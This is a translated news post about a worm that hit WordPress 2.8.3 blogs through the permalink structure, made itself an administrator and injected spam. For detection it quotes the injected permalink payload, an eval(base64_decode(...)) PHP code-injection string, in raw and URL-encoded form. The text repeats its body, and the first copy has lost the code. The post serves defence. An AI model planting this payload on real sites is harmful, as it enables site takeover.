WordPress's “smart worm” epidemic
A month ago, it became aware of a new critical vulnerability in WordPress 2.8.3, which allows you to easily change the administrator password in remote mode. Immediately released WordPress 2.8.4, eliminating this vulnerability. As it turned out, not all bloggers follow updates.
This weekend, a real outbreak of a new virus has erupted, hitting blogs on WordPress 2.8.3 and earlier in the 2.8 branch. The worm registers on the blog, launches the malicious code through the permalink structure and makes itself the second administrator, then launches the script to erase itself from the users page and begins to quietly add spam and links to the malicious content to archived topics.
The presence of a pest is quite difficult to detect right away, especially if it has not yet published anything. To do this, check the permalinks / rss feed for the presence of the following code.
or
')
or mistakes
If there is such a code or the feed is broken, then the blog is infected.
The worm removal procedure is a nontrivial task .
By the way, Matt Mullenweg delivered a large article on the topic of security, in which he urged users to constantly monitor and install the latest updates, here are instructions on how to upgrade WordPress . This is the only way to protect yourself from this and future epidemics.
This weekend, a real outbreak of a new virus has erupted, hitting blogs on WordPress 2.8.3 and earlier in the 2.8 branch. The worm registers on the blog, launches the malicious code through the permalink structure and makes itself the second administrator, then launches the script to erase itself from the users page and begins to quietly add spam and links to the malicious content to archived topics.
The presence of a pest is quite difficult to detect right away, especially if it has not yet published anything. To do this, check the permalinks / rss feed for the presence of the following code.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/or
')
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%or mistakes
'error on line 22 at column 71: xmlParseEntityRef: no name wordpress'If there is such a code or the feed is broken, then the blog is infected.
The worm removal procedure is a nontrivial task .
By the way, Matt Mullenweg delivered a large article on the topic of security, in which he urged users to constantly monitor and install the latest updates, here are instructions on how to upgrade WordPress . This is the only way to protect yourself from this and future epidemics.
Source: https://habr.com/ru/post/68905/
All Articles